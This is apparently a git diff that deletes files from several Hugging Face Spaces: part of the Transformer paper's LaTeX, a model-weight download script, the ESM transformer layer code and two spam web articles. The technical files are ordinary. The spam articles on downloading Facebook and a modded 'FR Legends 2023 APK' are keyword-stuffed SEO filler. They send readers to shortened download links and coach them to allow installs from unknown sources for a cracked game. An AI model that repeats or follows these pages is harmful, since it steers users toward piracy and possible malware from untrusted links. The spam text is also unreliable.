$\frac{1}{\sqrt{d_k}}$. Additive attention computes the compatibility function using a feed-forward network with a single hidden layer. While the two are similar in theoretical complexity, dot-product attention is much faster and more space-efficient in practice, since it can be implemented using highly optimized matrix multiplication code. - -%We scale the dot products by $1/\sqrt{d_k}$ to limit the magnitude of the dot products, which works well in practice. Otherwise, we found applying the softmax to often result in weights very close to 0 or 1, and hence minuscule gradients. - -% Already described in the subsequent section -%When used as part of decoder self-attention, an optional mask function is applied just before the softmax to prevent positions from attending to subsequent positions. This mask simply sets the logits corresponding to all illegal connections (those outside of the lower triangle) to $-\infty$. - -%\paragraph{Comparison to Additive Attention: } We choose dot product attention over additive attention \citep{bahdanau2014neural} since it can be computed using highly optimized matrix multiplication code. This optimization is particularly important to us, as we employ many attention layers in our model. - -While for small values of $d_k$ the two mechanisms perform similarly, additive attention outperforms dot product attention without scaling for larger values of $d_k$ \citep{DBLP:journals/corr/BritzGLL17}. We suspect that for large values of $d_k$, the dot products grow large in magnitude, pushing the softmax function into regions where it has extremely small gradients \footnote{To illustrate why the dot products get large, assume that the components of $q$ and $k$ are independent random variables with mean $0$ and variance $1$. Then their dot product, $q \cdot k = \sum_{i=1}^{d_k} q_ik_i$, has mean $0$ and variance $d_k$.}. To counteract this effect, we scale the dot products by $\frac{1}{\sqrt{d_k}}$. - - -%We suspect this to be caused by the dot products growing too large in magnitude to result in useful gradients after applying the softmax function. To counteract this, we scale the dot product by $1/\sqrt{d_k}$. - - -\subsubsection{Multi-Head Attention} \label{sec:multihead} - -\begin{figure} -\begin{minipage}[t]{0.5\textwidth} - \centering - Scaled Dot-Product Attention \\ - \vspace{0.5cm} - \includegraphics[scale=0.6]{Figures/ModalNet-19} -\end{minipage} -\begin{minipage}[t]{0.5\textwidth} - \centering - Multi-Head Attention \\ - \vspace{0.1cm} - \includegraphics[scale=0.6]{Figures/ModalNet-20} -\end{minipage} - - - % \centering - - \caption{(left) Scaled Dot-Product Attention. (right) Multi-Head Attention consists of several attention layers running in parallel.} - \label{fig:multi-head-att} -\end{figure} - -Instead of performing a single attention function with $\dmodel$-dimensional keys, values and queries, we found it beneficial to linearly project the queries, keys and values $h$ times with different, learned linear projections to $d_k$, $d_k$ and $d_v$ dimensions, respectively. -On each of these projected versions of queries, keys and values we then perform the attention function in parallel, yielding $d_v$-dimensional output values. These are concatenated and once again projected, resulting in the final values, as depicted in Figure~\ref{fig:multi-head-att}. - -Multi-head attention allows the model to jointly attend to information from different representation subspaces at different positions. With a single attention head, averaging inhibits this. - -\begin{align*} - \mathrm{MultiHead}(Q, K, V) &= \mathrm{Concat}(\mathrm{head_1}, ..., \mathrm{head_h})W^O\\ -% \mathrm{where} \mathrm{head_i} &= \mathrm{Attention}(QW_Q_i^{\dmodel \times d_q}, KW_K_i^{\dmodel \times d_k}, VW^V_i^{\dmodel \times d_v})\\ - \text{where}~\mathrm{head_i} &= \mathrm{Attention}(QW^Q_i, KW^K_i, VW^V_i)\\ -\end{align*} - -Where the projections are parameter matrices $W^Q_i \in \mathbb{R}^{\dmodel \times d_k}$, $W^K_i \in \mathbb{R}^{\dmodel \times d_k}$, $W^V_i \in \mathbb{R}^{\dmodel \times d_v}$ and $W^O \in \mathbb{R}^{hd_v \times \dmodel}$. - - -%find it better (and no more expensive) to have multiple parallel attention layers (each over the full set of positions) with proportionally lower-dimensional keys, values and queries. We call this "Multi-Head Attention" (Figure~\ref{fig:multi-head-att}). The keys, values, and queries for each of these parallel attention layers are computed by learned linear transformations of the inputs to the multi-head attention. We use different linear transformations across different parallel attention layers. The output of the parallel attention layers are concatenated, and then passed through a final learned linear transformation. - -In this work we employ $h=8$ parallel attention layers, or heads. For each of these we use $d_k=d_v=\dmodel/h=64$. -Due to the reduced dimension of each head, the total computational cost is similar to that of single-head attention with full dimensionality. - -\subsubsection{Applications of Attention in our Model} - -The Transformer uses multi-head attention in three different ways: -\begin{itemize} - \item In "encoder-decoder attention" layers, the queries come from the previous decoder layer, and the memory keys and values come from the output of the encoder. This allows every position in the decoder to attend over all positions in the input sequence. This mimics the typical encoder-decoder attention mechanisms in sequence-to-sequence models such as \citep{wu2016google, bahdanau2014neural,JonasFaceNet2017}. - - \item The encoder contains self-attention layers. In a self-attention layer all of the keys, values and queries come from the same place, in this case, the output of the previous layer in the encoder. Each position in the encoder can attend to all positions in the previous layer of the encoder. - - \item Similarly, self-attention layers in the decoder allow each position in the decoder to attend to all positions in the decoder up to and including that position. We need to prevent leftward information flow in the decoder to preserve the auto-regressive property. We implement this inside of scaled dot-product attention by masking out (setting to $-\infty$) all values in the input of the softmax which correspond to illegal connections. See Figure~\ref{fig:multi-head-att}. - -\end{itemize} - -\subsection{Position-wise Feed-Forward Networks}\label{sec:ffn} - -In addition to attention sub-layers, each of the layers in our encoder and decoder contains a fully connected feed-forward network, which is applied to each position separately and identically. This consists of two linear transformations with a ReLU activation in between. - -\begin{equation} - \mathrm{FFN}(x)=\max(0, xW_1 + b_1) W_2 + b_2 -\end{equation} - -While the linear transformations are the same across different positions, they use different parameters from layer to layer. Another way of describing this is as two convolutions with kernel size 1. The dimensionality of input and output is $\dmodel=512$, and the inner-layer has dimensionality $d_{ff}=2048$. - - - -%In the appendix, we describe how the position-wise feed-forward network can also be seen as a form of attention. - -%from Jakob: The number of operations required for the model to relate signals from two arbitrary input or output positions grows in the distance between positions in input or output, linearly for ConvS2S and logarithmically for ByteNet, making it harder to learn dependencies between these positions \citep{hochreiter2001gradient}. In the transformer this is reduced to a constant number of operations, albeit at the cost of effective resolution caused by averaging attention-weighted positions, an effect we aim to counteract with multi-headed attention. - - -%Figure~\ref{fig:simple-att} presents a simple attention function, $A$, with a single head, that forms the basis of our multi-head attention. $A$ takes a query key vector $\kq$, matrices of memory keys $\km$ and memory values $\vm$ ,and produces a query value vector $\vq$ as -%\begin{equation*} \label{eq:attention} -% A(\kq, \km, \vm) = {\vm}^T (Softmax(\km \kq). -%\end{equation*} -%We linearly transform $\kq,\,\km$, and $\vm$ with learned matrices ${\Wkq \text{,} \, \Wkm}$, and ${\Wvm}$ before calling the attention function, and transform the output query with $\Wvq$ before handing it to the feed forward layer. Each attention layer has it's own set of transformation matrices, which are shared across all query positions. $A$ is applied in parallel for each query position, and is implemented very efficiently as a batch of matrix multiplies. The self-attention and encoder-decoder attention layers use $A$, but with different arguments. For example, in encdoder self-attention, queries in encoder layer $i$ attention to memories in encoder layer $i-1$. To ensure that decoder self-attention layers do not look at future words, we add $- \inf$ to the softmax logits in positions $j+1$ to query length for query position $l$. - -%In simple attention, the query value is a weighted combination of the memory values where the attention weights sum to one. Although this function performs well in practice, the constraint on attention weights can restrict the amount of information that flows from memories to queries because the query cannot focus on multiple memory positions at once, which might be desirable when translating long sequences. \marginpar{@usz, could you think of an example of this ?} We remedy this by maintaining multiple attention heads at each query position that attend to all memory positions in parallel, with a different set of parameters per attention head $h$. -%\marginpar{} - -\subsection{Embeddings and Softmax} -Similarly to other sequence transduction models, we use learned embeddings to convert the input tokens and output tokens to vectors of dimension $\dmodel$. We also use the usual learned linear transformation and softmax function to convert the decoder output to predicted next-token probabilities. In our model, we share the same weight matrix between the two embedding layers and the pre-softmax linear transformation, similar to \citep{press2016using}. In the embedding layers, we multiply those weights by $\sqrt{\dmodel}$. - - -\subsection{Positional Encoding} -Since our model contains no recurrence and no convolution, in order for the model to make use of the order of the sequence, we must inject some information about the relative or absolute position of the tokens in the sequence. To this end, we add "positional encodings" to the input embeddings at the bottoms of the encoder and decoder stacks. The positional encodings have the same dimension $\dmodel$ as the embeddings, so that the two can be summed. There are many choices of positional encodings, learned and fixed \citep{JonasFaceNet2017}. - -In this work, we use sine and cosine functions of different frequencies: - -\begin{align*} - PE_{(pos,2i)} = sin(pos / 10000^{2i/\dmodel}) \\ - PE_{(pos,2i+1)} = cos(pos / 10000^{2i/\dmodel}) -\end{align*} - -where $pos$ is the position and $i$ is the dimension. That is, each dimension of the positional encoding corresponds to a sinusoid. The wavelengths form a geometric progression from $2\pi$ to $10000 \cdot 2\pi$. We chose this function because we hypothesized it would allow the model to easily learn to attend by relative positions, since for any fixed offset $k$, $PE_{pos+k}$ can be represented as a linear function of $PE_{pos}$. - -We also experimented with using learned positional embeddings \citep{JonasFaceNet2017} instead, and found that the two versions produced nearly identical results (see Table~\ref{tab:variations} row (E)). We chose the sinusoidal version because it may allow the model to extrapolate to sequence lengths longer than the ones encountered during training. diff --git a/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py b/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py deleted file mode 100644 index 7df5be6fc260394ee9bbd0a7ae377e2ca657fe83..0000000000000000000000000000000000000000 --- a/spaces/shiwan10000/CodeFormer/CodeFormer/scripts/download_pretrained_models_from_gdrive.py +++ /dev/null @@ -1,60 +0,0 @@ -import argparse -import os -from os import path as osp - -# from basicsr.utils.download_util import download_file_from_google_drive -import gdown - - -def download_pretrained_models(method, file_ids): - save_path_root = f'./weights/{method}' - os.makedirs(save_path_root, exist_ok=True) - - for file_name, file_id in file_ids.items(): - file_url = 'https://drive.google.com/uc?id='+file_id - save_path = osp.abspath(osp.join(save_path_root, file_name)) - if osp.exists(save_path): - user_response = input(f'{file_name} already exist. Do you want to cover it? Y/N\n') - if user_response.lower() == 'y': - print(f'Covering {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - elif user_response.lower() == 'n': - print(f'Skipping {file_name}') - else: - raise ValueError('Wrong input. Only accepts Y/N.') - else: - print(f'Downloading {file_name} to {save_path}') - gdown.download(file_url, save_path, quiet=False) - # download_file_from_google_drive(file_id, save_path) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - - parser.add_argument( - 'method', - type=str, - help=("Options: 'CodeFormer' 'facelib'. Set to 'all' to download all the models.")) - args = parser.parse_args() - - # file name: file id - # 'dlib': { - # 'mmod_human_face_detector-4cb19393.dat': '1qD-OqY8M6j4PWUP_FtqfwUPFPRMu6ubX', - # 'shape_predictor_5_face_landmarks-c4b1e980.dat': '1vF3WBUApw4662v9Pw6wke3uk1qxnmLdg', - # 'shape_predictor_68_face_landmarks-fbdc2cb8.dat': '1tJyIVdCHaU6IDMDx86BZCxLGZfsWB8yq' - # } - file_ids = { - 'CodeFormer': { - 'codeformer.pth': '1v_E_vZvP-dQPF55Kc5SRCjaKTQXDz-JB' - }, - 'facelib': { - 'yolov5l-face.pth': '131578zMA6B2x8VQHyHfa6GEPtulMCNzV', - 'parsing_parsenet.pth': '16pkohyZZ8ViHGBk3QtVqxLZKzdo466bK' - } - } - - if args.method == 'all': - for method in file_ids.keys(): - download_pretrained_models(method, file_ids[method]) - else: - download_pretrained_models(args.method, file_ids[args.method]) \ No newline at end of file diff --git a/spaces/sil-ai/aqua-comprehensibility/README.md b/spaces/sil-ai/aqua-comprehensibility/README.md deleted file mode 100644 index 2469b226a7101070c4b85c58073a3a2e262ecab7..0000000000000000000000000000000000000000 --- a/spaces/sil-ai/aqua-comprehensibility/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: AQuA Comprehensibility -emoji: 💦 -colorFrom: purple -colorTo: green -sdk: gradio -sdk_version: 2.9.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py b/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py deleted file mode 100644 index 55f4305c0671bfc0481974ee32f4dd1d6fb03533..0000000000000000000000000000000000000000 --- a/spaces/simonduerr/diffdock/esm/esm/inverse_folding/transformer_layer.py +++ /dev/null @@ -1,304 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# Contents of this file were adapted from the open source fairseq repository. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from typing import Dict, List, Optional - -import torch -import torch.nn as nn -import torch.nn.functional as F -from esm.multihead_attention import MultiheadAttention -from torch import Tensor - - -class TransformerEncoderLayer(nn.Module): - """Encoder layer block. - `layernorm -> dropout -> add residual` - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - - def __init__(self, args): - super().__init__() - self.args = args - self.embed_dim = args.encoder_embed_dim - self.self_attn = self.build_self_attention(self.embed_dim, args) - self.self_attn_layer_norm = torch.nn.LayerNorm(self.embed_dim) - self.dropout_module = nn.Dropout(args.dropout) - self.activation_fn = F.relu - self.fc1 = self.build_fc1( - self.embed_dim, - args.encoder_ffn_embed_dim, - ) - self.fc2 = self.build_fc2( - args.encoder_ffn_embed_dim, - self.embed_dim, - ) - - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def build_fc1(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_fc2(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_self_attention(self, embed_dim, args): - return MultiheadAttention( - embed_dim, - args.encoder_attention_heads, - dropout=args.attention_dropout, - self_attention=True, - ) - - def residual_connection(self, x, residual): - return residual + x - - def forward( - self, - x, - encoder_padding_mask: Optional[Tensor], - attn_mask: Optional[Tensor] = None, - ): - """ - Args: - x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - encoder_padding_mask (ByteTensor): binary ByteTensor of shape - `(batch, seq_len)` where padding elements are indicated by ``1``. - attn_mask (ByteTensor): binary tensor of shape `(tgt_len, src_len)`, - where `tgt_len` is the length of output and `src_len` is the - length of input, though here both are equal to `seq_len`. - `attn_mask[tgt_i, src_j] = 1` means that when calculating the - embedding for `tgt_i`, we exclude (mask out) `src_j`. This is - useful for strided self-attention. - - Returns: - encoded output of shape `(seq_len, batch, embed_dim)` - """ - # anything in original attn_mask = 1, becomes -1e8 - # anything in original attn_mask = 0, becomes 0 - # Note that we cannot use -inf here, because at some edge cases, - # the attention weight (before softmax) for some padded element in query - # will become -inf, which results in NaN in model parameters - if attn_mask is not None: - attn_mask = attn_mask.masked_fill( - attn_mask.to(torch.bool), -1e8 if x.dtype == torch.float32 else -1e4 - ) - - residual = x - x = self.self_attn_layer_norm(x) - x, _ = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=encoder_padding_mask, - need_weights=False, - attn_mask=attn_mask, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - residual = x - x = self.final_layer_norm(x) - x = self.activation_fn(self.fc1(x)) - x = self.fc2(x) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - return x - - -class TransformerDecoderLayer(nn.Module): - """Decoder layer block. - `layernorm -> dropout -> add residual` - - Args: - args (argparse.Namespace): parsed command-line arguments - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). - """ - - def __init__( - self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False - ): - super().__init__() - self.embed_dim = args.decoder_embed_dim - self.dropout_module = nn.Dropout(args.dropout) - - self.self_attn = self.build_self_attention( - self.embed_dim, - args, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - ) - self.nh = self.self_attn.num_heads - self.head_dim = self.self_attn.head_dim - - self.activation_fn = F.relu - - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - - if no_encoder_attn: - self.encoder_attn = None - self.encoder_attn_layer_norm = None - else: - self.encoder_attn = self.build_encoder_attention(self.embed_dim, args) - self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim) - - self.ffn_layernorm = ( - LayerNorm(args.decoder_ffn_embed_dim) - if getattr(args, "scale_fc", False) - else None - ) - self.w_resid = ( - nn.Parameter( - torch.ones( - self.embed_dim, - ), - requires_grad=True, - ) - if getattr(args, "scale_resids", False) - else None - ) - - self.fc1 = self.build_fc1( - self.embed_dim, - args.decoder_ffn_embed_dim, - ) - self.fc2 = self.build_fc2( - args.decoder_ffn_embed_dim, - self.embed_dim, - ) - - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - self.need_attn = True - - def build_fc1(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_fc2(self, input_dim, output_dim): - return nn.Linear(input_dim, output_dim) - - def build_self_attention( - self, embed_dim, args, add_bias_kv=False, add_zero_attn=False - ): - return MultiheadAttention( - embed_dim, - args.decoder_attention_heads, - dropout=args.attention_dropout, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - self_attention=True, - ) - - def build_encoder_attention(self, embed_dim, args): - return MultiheadAttention( - embed_dim, - args.decoder_attention_heads, - kdim=args.encoder_embed_dim, - vdim=args.encoder_embed_dim, - dropout=args.attention_dropout, - encoder_decoder_attention=True, - ) - - def residual_connection(self, x, residual): - return residual + x - - def forward( - self, - x, - encoder_out: Optional[torch.Tensor] = None, - encoder_padding_mask: Optional[torch.Tensor] = None, - incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None, - prev_self_attn_state: Optional[List[torch.Tensor]] = None, - prev_attn_state: Optional[List[torch.Tensor]] = None, - self_attn_mask: Optional[torch.Tensor] = None, - self_attn_padding_mask: Optional[torch.Tensor] = None, - need_attn: bool = False, - need_head_weights: bool = False, - ): - """ - Args: - x (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - encoder_padding_mask (ByteTensor, optional): binary - ByteTensor of shape `(batch, src_len)` where padding - elements are indicated by ``1``. - need_attn (bool, optional): return attention weights - need_head_weights (bool, optional): return attention weights - for each head (default: return average over heads). - - Returns: - encoded output of shape `(seq_len, batch, embed_dim)` - """ - if need_head_weights: - need_attn = True - - residual = x - x = self.self_attn_layer_norm(x) - if prev_self_attn_state is not None: - prev_key, prev_value = prev_self_attn_state[:2] - saved_state: Dict[str, Optional[Tensor]] = { - "prev_key": prev_key, - "prev_value": prev_value, - } - if len(prev_self_attn_state) >= 3: - saved_state["prev_key_padding_mask"] = prev_self_attn_state[2] - assert incremental_state is not None - self.self_attn._set_input_buffer(incremental_state, saved_state) - _self_attn_input_buffer = self.self_attn._get_input_buffer(incremental_state) - y = x - - x, attn = self.self_attn( - query=x, - key=y, - value=y, - key_padding_mask=self_attn_padding_mask, - incremental_state=incremental_state, - need_weights=False, - attn_mask=self_attn_mask, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - if self.encoder_attn is not None and encoder_out is not None: - residual = x - x = self.encoder_attn_layer_norm(x) - if prev_attn_state is not None: - prev_key, prev_value = prev_attn_state[:2] - saved_state: Dict[str, Optional[Tensor]] = { - "prev_key": prev_key, - "prev_value": prev_value, - } - if len(prev_attn_state) >= 3: - saved_state["prev_key_padding_mask"] = prev_attn_state[2] - assert incremental_state is not None - self.encoder_attn._set_input_buffer(incremental_state, saved_state) - - x, attn = self.encoder_attn( - query=x, - key=encoder_out, - value=encoder_out, - key_padding_mask=encoder_padding_mask, - incremental_state=incremental_state, - static_kv=True, - need_weights=need_attn or (not self.training and self.need_attn), - need_head_weights=need_head_weights, - ) - x = self.dropout_module(x) - x = self.residual_connection(x, residual) - - residual = x - x = self.final_layer_norm(x) - - x = self.activation_fn(self.fc1(x)) - if self.ffn_layernorm is not None: - x = self.ffn_layernorm(x) - x = self.fc2(x) - x = self.dropout_module(x) - if self.w_resid is not None: - residual = torch.mul(self.w_resid, residual) - x = self.residual_connection(x, residual) - return x, attn, None diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md deleted file mode 100644 index 5e3034f0908fc2c0d812b875991739c78f8d2fd4..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/Download Facebook for Android Tips and Tricks to Enhance Your Experience.md +++ /dev/null @@ -1,99 +0,0 @@ -
      -

      How to Download Facebook for Android

      -

      Facebook is one of the most popular social media platforms in the world. It allows you to connect with your friends and family, share updates and photos, follow your favorite pages and groups, play games, watch videos, and more. If you have an Android device, you can download Facebook for free from the Google Play Store or from the Facebook website.

      -

      download android facebook


      DOWNLOADhttps://ssurll.com/2uNVFo



      -

      Benefits of Using Facebook on Android

      -

      Stay connected with friends and family

      -

      With Facebook, you can chat with your friends and family through Messenger, make voice and video calls, send stickers and emojis, create group chats, and join rooms. You can also see what your friends are up to by checking their timelines, stories, and live streams.

      -

      Share updates and photos

      -

      With Facebook, you can express yourself by posting status updates, photos, videos, GIFs, polls, and more. You can also use Facebook emoji to help relay what’s going on in your world. You can choose who can see your posts by adjusting your privacy settings. You can also react to other people’s posts by liking, commenting, or sharing them.

      -

      Follow your favorite pages and groups

      -

      With Facebook, you can follow your favorite celebrities, brands, news sources, artists, or sports teams to get their latest news and updates. You can also join groups that match your interests or hobbies, such as cooking, gaming, gardening, or traveling. You can interact with other members of the groups by posting questions, answers, tips, or feedback.

      -

      How to Download Facebook for Android from Google Play Store

      -

      Open the Google Play Store app on your Android device

      -

      The Google Play Store is the official app store for Android devices. You can find it on your home screen or in your app drawer.

      -

      Search for Facebook in the search bar

      -

      Tap on the search bar at the top of the screen and type in "Facebook". You will see a list of results that match your query.

      -

      Tap on the Facebook app icon and then tap on Install

      -

      The Facebook app icon is a blue square with a white letter "f" inside it. Tap on it to open its details page. Then tap on the green Install button to start downloading the app.

      -

      download android facebook lite apk
      -download android facebook messenger app
      -download android facebook video downloader
      -download android facebook mod apk
      -download android facebook app old version
      -download android facebook dark mode
      -download android facebook gameroom
      -download android facebook story saver
      -download android facebook auto liker
      -download android facebook password hacker
      -download android facebook chat heads
      -download android facebook dating app
      -download android facebook live stream
      -download android facebook page manager
      -download android facebook status downloader
      -download android facebook transparent apk
      -download android facebook watch app
      -download android facebook beta version
      -download android facebook creator studio
      -download android facebook events app
      -download android facebook groups app
      -download android facebook home apk
      -download android facebook instant articles
      -download android facebook katana apk
      -download android facebook lite mod apk
      -download android facebook marketplace app
      -download android facebook notification sound
      -download android facebook orca apk
      -download android facebook profile viewer
      -download android facebook quiz app
      -download android facebook reactions apk
      -download android facebook sdk zip file
      -download android facebook stickers pack
      -download android facebook timeline cleaner
      -download android facebook unfriend finder
      -download android facebook video call recorder
      -download android facebook webview apk
      -download android facebook xap file
      -download android facebook yellow apk
      -how to download and install the Facebook app on Android devices?
      -how to update the Facebook app on Android devices?
      -how to uninstall the Facebook app on Android devices?
      -how to fix the Facebook app not working on Android devices?
      -how to clear the Facebook app cache on Android devices?
      -how to change the Facebook app language on Android devices?
      -how to enable the Facebook app lock on Android devices?
      -how to disable the Facebook app notifications on Android devices?
      -how to manage the Facebook app permissions on Android devices?
      -how to sync the Facebook app contacts on Android devices?

      -

      Wait for the app to download and install on your device

      -

      The download and installation process may take a few minutes depending on your internet speed and device storage. You can see the progress of the download by looking at the progress bar below the Install button.

      -

      How to Download Facebook Lite for Android from Facebook Website

      -

      Open your web browser and go to [2](https://www.facebook.com/lite)

      -

      You can use any web browser that supports HTML, such as Chrome, Firefox, or Safari. Then type in the URL [2](https://www.facebook.com/lite) in the address bar and press Enter.

      -

      Tap on the Download button and then tap on OK

      -

      You will see a blue Download button on the web page. Tap on it to start downloading the Facebook Lite APK file. APK stands for Android Package Kit, which is a file format that contains the app's code and resources. You may see a warning message that says "This type of file can harm your device". Don't worry, this is just a standard message for any APK file that is not from the Google Play Store. Tap on OK to continue.

      -

      Go to your Downloads folder and tap on the Facebook Lite APK file

      -

      Once the download is complete, you can find the Facebook Lite APK file in your Downloads folder. You can access it by opening your File Manager app or by swiping down from the top of the screen and tapping on the notification. Tap on the file to open it.

      -

      Tap on Install and then tap on Open

      -

      You may see a message that says "For your security, your phone is not allowed to install unknown apps from this source". This means that you need to enable the permission to install apps from unknown sources. To do this, tap on Settings and then toggle on the switch next to Allow from this source. Then go back to the previous screen and tap on Install. Wait for the app to install on your device. Then tap on Open to launch it.

      -

      Comparison of Facebook and Facebook Lite for Android

      -

      Size and data usage

      -

      One of the main differences between Facebook and Facebook Lite is their size and data usage. Facebook Lite is designed to be smaller and faster than Facebook, especially on low-end devices or slow networks. According to the Google Play Store, Facebook Lite is only about 2 MB in size, while Facebook is about 40 MB. This means that Facebook Lite takes up less space on your device and consumes less data when downloading or updating.

      -

      Features and performance

      -

      Another difference between Facebook and Facebook Lite is their features and performance. Facebook Lite has most of the basic features of Facebook, such as posting, commenting, liking, messaging, calling, watching videos, and browsing pages and groups. However, some features are not available or limited on Facebook Lite, such as stories, live streams, reactions, stickers, games, marketplace, dating, and dark mode. On the other hand, Facebook Lite is faster and more reliable than Facebook on slow or unstable connections. It also works well on older or weaker devices that may struggle with running Facebook smoothly.

      -

      Conclusion

      -

      In conclusion, Facebook is a great app for Android users who want to enjoy the full social media experience with all its features and functions. However, if you have a limited device storage or data plan, or if you live in an area with poor network coverage, you may want to try Facebook Lite instead. It is a lighter and faster version of Facebook that still lets you stay connected with your friends and family.

      -

      So what are you waiting for? Download Facebook or Facebook Lite for Android today and join the millions of people who use it every day!

      -

      Frequently Asked Questions

      -

      How do I update Facebook or Facebook Lite for Android?

      -

      To update Facebook or Facebook Lite for Android, you can either go to the Google Play Store app and check for updates, or you can visit their respective websites and download the latest APK files.

      -

      How do I delete Facebook or Facebook Lite for Android?

      -

      To delete Facebook or Facebook Lite for Android, you can either go to your device settings and uninstall them like any other app, or you can go to their respective websites and follow the instructions to deactivate or delete your account.

      -

      How do I switch between Facebook and Facebook Lite for Android?

      -

      To switch between Facebook and Facebook Lite for Android, you can either install both apps on your device and use them interchangeably, or you can uninstall one app and install the other one instead.

      -

      How do I contact Facebook support for Android?

      -

      To contact Facebook support for Android, you can either go to their Help Center website and browse through their topics and FAQs, or you can go to their app settings and tap on Help & Support.

      -

      How do I report a problem with Facebook or Facebook Lite for Android?

      -

      To report a problem with Facebook or Facebook Lite for Android, you can either go to their app settings and tap on Report a Problem, or you can go to their Help Center website and tap on Report a Problem.

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md deleted file mode 100644 index aca339f013d135d83072783922516e00fd768b64..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md +++ /dev/null @@ -1,128 +0,0 @@ -
      -

      FR Legends 2023 APK: The Ultimate Drifting Game for Android

      -

      If you are a fan of drifting, you must have heard of FR Legends, the most popular and realistic drifting game for mobile devices. FR Legends is all about driving legendary front-engine, rear-wheel-drive (FR) cars at iconic circuits around the world, and customizing everything on your car, from engine swaps to body kits. You can also compete with other players online and show off your drifting skills on the leaderboards.

      -

      But what if you want to enjoy the game without spending real money or watching annoying ads? What if you want to access all the cars and tracks without grinding for hours? What if you want to play the latest version of the game with new features and improvements?

      -

      fr legends 2023 apk


      Download Ziphttps://ssurll.com/2uNRFb



      -

      Well, there is a solution for you: FR Legends 2023 APK. This is a modified version of the original game that gives you unlimited money, unlocked cars, no ads, and more. In this article, we will tell you everything you need to know about FR Legends 2023 APK, including what it is, how to download and install it, why you should choose it, and what are the risks involved. Let's get started!

      -

      What is FR Legends?

      -

      FR Legends is a drifting game developed by TWIN TURBO TECH CO., LTD, a Chinese indie game studio. It was released in 2018 for iOS and Android devices, and has since gained millions of fans worldwide. The game is praised for its realistic physics and graphics, its variety of customizable cars and tracks, and its online multiplayer mode.

      -

      Features of FR Legends

      -

      Realistic physics and graphics

      -

      One of the main attractions of FR Legends is its realistic physics engine that simulates the behavior of real cars on different surfaces and conditions. You can feel the weight transfer, the tire grip, the steering angle, and the throttle response as you drift your car around corners. The game also features stunning graphics that bring the cars and tracks to life. You can see the smoke, sparks, dust, and damage effects as you slide your car sideways.

      -

      Customizable cars and tracks

      -

      Another feature that makes FR Legends stand out is its customization system that lets you modify every aspect of your car. You can choose from dozens of FR cars from different manufacturers, such as Toyota, Nissan, Mazda, BMW, Ford, and more. You can also swap engines, change transmissions, adjust suspensions, install body kits, paint colors, add stickers, and more. You can even create your own custom tracks using the track editor.

      -

      Online multiplayer and leaderboards

      -

      If you want to challenge yourself and others, you can join the online multiplayer mode of FR Legends. You can either race against other players in solo or tandem battles, or join a team and cooperate with your teammates. You can also chat with other players using the voice chat feature. The game also has leaderboards that rank players based on their scores, skills, and reputation. You can earn rewards and trophies by climbing up the ranks.

      -

      How to download and install FR Legends 2023 APK?

      -

      If you are interested in downloading and installing FR Legends 2023 APK on your Android device, you need to follow some simple steps. But before that, you need to make sure that your device meets the following requirements and compatibility:

      Requirements and compatibility

      -
        -
      • Your device must have Android 4.1 or higher operating system.
      • -
      • Your device must have at least 1 GB of RAM and 100 MB of free storage space.
      • -
      • Your device must have a stable internet connection to play online.
      • -
      • Your device must allow installation of apps from unknown sources. You can enable this option by going to Settings > Security > Unknown Sources and toggling it on.
      • -
      -

      Steps to download and install

      -
        -
      1. Click on this link to download the FR Legends 2023 APK file: [Download FR Legends 2023 APK].
      2. -
      3. Once the download is complete, locate the file in your device's file manager and tap on it to start the installation process.
      4. -
      5. Follow the instructions on the screen and grant the necessary permissions to the app.
      6. -
      7. Wait for the installation to finish and then launch the app from your home screen or app drawer.
      8. -
      9. Enjoy the game with unlimited money, unlocked cars, no ads, and more!
      10. -
      -

      Tips and tricks to enjoy the game

      -
        -
      • To drift better, you need to master the throttle, brake, handbrake, and steering controls. You can also adjust the sensitivity and layout of the controls in the settings menu.
      • -
